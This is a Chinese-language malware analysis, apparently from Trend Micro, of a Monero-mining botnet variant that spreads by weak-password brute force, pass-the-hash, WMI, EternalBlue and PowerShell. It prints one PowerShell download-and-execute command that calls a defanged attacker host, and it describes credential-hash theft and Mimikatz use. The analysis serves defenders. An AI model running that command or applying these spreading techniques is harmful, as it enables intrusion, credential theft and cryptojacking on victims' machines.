影响国人的挖矿恶意软件新变种已蔓延海外

趋势科技曾在2019年初在中国的大陆、台湾和香港地区发现了一类新的门罗币挖矿恶意软件变种，此恶意软件通过多种传播感染方法在系统和服务器中大肆植入加密货币挖矿机。在我们之前观测的样本中，其感染方式包括弱密码测试，以及使用哈希传递技术、Windows管理工具，和公开可用代码进行暴力攻击。然而近期，我们在日本发现了此恶意软件的新变种，攻击者在其中通过利用“永恒之蓝”漏洞和PowerShell脚本来侵入系统并逃避检测。
同时，我们的遥测技术显示，现今除了台湾和香港之外，在澳大利亚、越南、印度等地也出现了这类威胁，由此来看，攻击者正将僵尸网络扩散到其他国家和地区。
传播与行为
此恶意软件（由趋势科技检测为Trojan.PS1.LUDICROUZ.A）的主要传播技术是在受感染的机器上，根据弱密码列表来尝试登录网络中连接的其他计算机。恶意软件并非直接将远程命令发送到所连接的系统中去，而是先更改受感染计算机的防火墙和端口转发设置，并设置一个计划任务来下载和执行更新后的恶意软件副本。下载好的副本是个PowerShell脚本，由下列命令执行：
IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

表1.弱密码列表。
恶意软件利用此表以及Invoke-WMIMethod(由趋势科技检测为HackTool.Win32.Impacket.AI)来远程访问其他计算机：

图1.Invoke-WMIMethod，用于远程访问设置的是弱密码的计算机。
恶意软件还使用哈希传递方法，通过用户的哈希密码向远程服务器验证自己身份。这种方法的步骤是，恶意软件首先通过使用Get-PassHashes命令获取存储在计算机中的哈希值，同时还有上面列出的弱密码列表的哈希值；获取哈希值后，恶意软件使用invok – smbclient(另一个公开可用的脚本)通过哈希传递来执行文件共享操作。


图2.使用哈希传递技术获取用户密码哈希值和弱密码哈希值。
如果成功，它将删除文件％Start Menu％ Programs Startup run.bat，此文件可能是植入的旧版本恶意软件文件，它还删除以下内容：
· ％Application Data％ flashplayer.tmp
· ％Application Data％ sign.txt  – 用于指示计算机已被感染
· %Start Menu%ProgramsStartupFlashPlayer.lnk – 负责在启动时执行tmp脚本
如果用户使用的是强密码，则恶意软件利用“永恒之蓝”进行传播。

图3.漏洞利用的相关有效负载。
通过上述方法感染计算机后，恶意软件将获取MAC地址并收集有关计算机中安装的防病毒产品的信息。它从C＆C服务器下载另一个混淆的PowerShell脚本（趋势科技检测为Trojan.PS1.PCASTLE.B），并将获取的信息发回。下载的PowerShell是一个dropper，负责下载和执行恶意软件的组件，其中大部分是自身的副本。

图4.获取MAC地址和AV产品的例行程序。
恶意软件为了检查是否已经安装其组件，会寻找以下文件:
· %Temp%kkk1.log
· %Temp%pp2.log
· %Temp%333.log
· %Temp%kk4.log
· %Temp%kk5.log

图5.检查是否已安装的恶意软件组件。
每个$ flagX代表一个组件。上述的PowerShell dropper脚本就是第一个组件$ flag，恶意软件通过安装一个计划任务来定期运行此脚本并检查更新。恶意软件的行为则取决于此脚本运行时的权限。第二个组件$ flag2可以从不同的URL地址处下载恶意软件的副本，并创建一个不同名称的调度任务。


图6.组件$ flag和$ flag2。
第三个组件（由趋势科技检测为TrojanSpy.Win32.BEAHNY.THCACAI）是一个植入的木马程序——一份更大文件尺寸的自身副本，可能会逃避沙箱检测，并从主机收集系统信息，包括：
· 电脑名称
· 机器的GUID
· MAC地址
· 操作系统版本
· 图像内存信息
· 系统时间
第四个组件是Python编译的二进制可执行文件，它能进一步传播恶意软件，还能够通过植入和执行Mimikatz的PowerShell实现（由趋势科技检测为Trojan.PS1.MIMIKATZ.ADW）来传递哈希攻击。